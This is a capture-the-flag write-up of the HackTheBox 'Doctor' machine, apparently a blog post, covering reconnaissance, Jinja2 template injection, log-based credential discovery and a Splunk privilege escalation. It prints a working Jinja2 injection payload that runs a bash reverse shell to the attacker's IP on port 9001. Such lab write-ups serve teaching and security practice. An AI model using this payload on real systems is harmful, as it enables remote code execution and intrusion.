HackTheBox Writeup — Doctor

Hello Guys , I am Faisal Husaini. My username on HTB is “feodore” . Also join me on discord.

The IP of this box is 10.10.10.209

Running NMAP full port scan on it , we get

We find 3 Open Ports for SSH , Apache and Splunk

Moving towards the Web part first

Checking the IP in the browser, we get a wonderful medical website

We can see a host name doctors.htb in the website which we add to the hosts file and then move towards checking it on the browser

We get a login page, now I create a user and then login and see that there was a message posting functionality where I injected some template injection payloads

We dont see anything happening in backend, but looking on the gobuster results, we see that we have a /archive directory

Also if we check the source code after login, it also says that the directory is under beta testing

Checking the source code of /archive as it had all blank, we see that the payloads we injected , one of them got us a success

And throughout my testing I figured out the template engine being used is Jinja2

Jinja2

So I used the below payload from PayloadAllTheThings to get the reverse shell

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen('bash -c "bash -i >& /dev/tcp/10.10.14.34/9001 0>&1"').read()}}{%endif%}{%endfor%}

We got reverse shell and now move towards user escalation

The current user web has a group membership of adm which had file read permissions on various log files

One of the log files leaks a password which we try to use for user Shaun

As on the startup, we saw that the machine had Splunk 8.0.5 running and upon google searching for its local privilege escalation, there was a bash coded exploit which helps us escalate to root with no issue

Hacker | Bug Hunter | Python Coder | Gamer | Reverse Engineering Lover

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store